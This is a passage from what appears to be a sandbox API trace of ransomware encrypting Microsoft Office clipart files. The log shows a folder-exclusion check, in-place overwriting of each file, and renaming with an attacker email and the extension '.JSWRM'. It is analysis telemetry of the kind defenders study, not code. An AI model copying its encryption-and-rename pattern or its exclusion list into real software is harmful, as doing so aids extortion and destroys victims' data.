Flags=0x0, Size=0xa0) returned 0x23cca8 [0085.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0085.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0085.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.611] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153302.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153302.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0085.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0085.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0085.612] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9658, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153305.WMF", cAlternateFileName="")) returned 1 [0085.612] lstrcmpiW (lpString1="J0153305.WMF", lpString2=".") returned 1 [0085.612] lstrcmpiW (lpString1="J0153305.WMF", lpString2="..") returned 1 [0085.612] lstrcmpiW (lpString1="J0153305.WMF", lpString2="...") returned 1 [0085.612] lstrcmpiW (lpString1="J0153305.WMF", lpString2="windows") returned -1 [0085.612] lstrcmpiW (lpString1="J0153305.WMF", lpString2="recovery") returned -1 [0085.612] lstrcmpiW (lpString1="J0153305.WMF", lpString2="perflogs") returned -1 [0085.612] lstrcmpiW (lpString1="J0153305.WMF", lpString2="documents and settings") returned 1 [0085.612] lstrcmpiW (lpString1="J0153305.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.612] lstrcmpiW (lpString1="J0153305.WMF", lpString2="system volume information") returned -1 [0085.612] lstrcmpiW (lpString1="J0153305.WMF", lpString2="msocache") returned -1 [0085.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0085.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153305.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153305.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153305.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0085.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0085.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153305.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153305.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153305.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0085.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0085.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0085.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0085.612] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153305.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.613] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=38488) returned 1 [0085.613] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9650) returned 0x24d210 [0085.613] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9650, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9650, lpOverlapped=0x0) returned 1 [0085.617] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.617] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9650, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9650, lpOverlapped=0x0) returned 1 [0085.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.618] CloseHandle (hObject=0x314) returned 1 [0085.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0085.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0085.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0085.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0085.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0085.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0085.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.619] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153305.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153305.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0085.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0085.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0085.619] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3c58, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153307.WMF", cAlternateFileName="")) returned 1 [0085.620] lstrcmpiW (lpString1="J0153307.WMF", lpString2=".") returned 1 [0085.620] lstrcmpiW (lpString1="J0153307.WMF", lpString2="..") returned 1 [0085.620] lstrcmpiW (lpString1="J0153307.WMF", lpString2="...") returned 1 [0085.620] lstrcmpiW (lpString1="J0153307.WMF", lpString2="windows") returned -1 [0085.620] lstrcmpiW (lpString1="J0153307.WMF", lpString2="recovery") returned -1 [0085.620] lstrcmpiW (lpString1="J0153307.WMF", lpString2="perflogs") returned -1 [0085.620] lstrcmpiW (lpString1="J0153307.WMF", lpString2="documents and settings") returned 1 [0085.620] lstrcmpiW (lpString1="J0153307.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.620] lstrcmpiW (lpString1="J0153307.WMF", lpString2="system volume information") returned -1 [0085.620] lstrcmpiW (lpString1="J0153307.WMF", lpString2="msocache") returned -1 [0085.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0085.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153307.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153307.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153307.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0085.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0085.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153307.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153307.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153307.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0085.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0085.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0085.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0085.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153307.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.620] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15448) returned 1 [0085.621] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3c50) returned 0x24d210 [0085.621] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3c50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3c50, lpOverlapped=0x0) returned 1 [0085.626] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.626] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3c50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3c50, lpOverlapped=0x0) returned 1 [0085.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.626] CloseHandle (hObject=0x314) returned 1 [0085.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0085.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0085.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0085.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0085.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0085.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0085.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.627] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153307.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153307.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0085.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0085.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0085.628] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4238, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153313.WMF", cAlternateFileName="")) returned 1 [0085.628] lstrcmpiW (lpString1="J0153313.WMF", lpString2=".") returned 1 [0085.628] lstrcmpiW (lpString1="J0153313.WMF", lpString2="..") returned 1 [0085.628] lstrcmpiW (lpString1="J0153313.WMF", lpString2="...") returned 1 [0085.628] lstrcmpiW (lpString1="J0153313.WMF", lpString2="windows") returned -1 [0085.628] lstrcmpiW (lpString1="J0153313.WMF", lpString2="recovery") returned -1 [0085.628] lstrcmpiW (lpString1="J0153313.WMF", lpString2="perflogs") returned -1 [0085.628] lstrcmpiW (lpString1="J0153313.WMF", lpString2="documents and settings") returned 1 [0085.628] lstrcmpiW (lpString1="J0153313.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.628] lstrcmpiW (lpString1="J0153313.WMF", lpString2="system volume information") returned -1 [0085.628] lstrcmpiW (lpString1="J0153313.WMF", lpString2="msocache") returned -1 [0085.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0085.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153313.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153313.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153313.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0085.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0085.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153313.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153313.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153313.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0085.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0085.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0085.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0085.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153313.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.629] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16952) returned 1 [0085.629] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4230) returned 0x24d210 [0085.629] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4230, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4230, lpOverlapped=0x0) returned 1 [0085.640] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.640] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4230, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4230, lpOverlapped=0x0) returned 1 [0085.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.640] CloseHandle (hObject=0x314) returned 1 [0085.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0085.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0085.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0085.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0085.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0085.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0085.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0085.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0085.641] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153313.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153313.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0085.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0085.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0085.641] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4464, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153398.WMF", cAlternateFileName="")) returned 1 [0085.641] lstrcmpiW (lpString1="J0153398.WMF", lpString2=".") returned 1 [0085.641] lstrcmpiW (lpString1="J0153398.WMF", lpString2="..") returned 1 [0085.641] lstrcmpiW (lpString1="J0153398.WMF", lpString2="...") returned 1 [0085.641] lstrcmpiW (lpString1="J0153398.WMF", lpString2="windows") returned -1 [0085.641] lstrcmpiW (lpString1="J0153398.WMF", lpString2="recovery") returned -1 [0085.641] lstrcmpiW (lpString1="J0153398.WMF", lpString2="perflogs") returned -1 [0085.641] lstrcmpiW (lpString1="J0153398.WMF", lpString2="documents and settings") returned 1 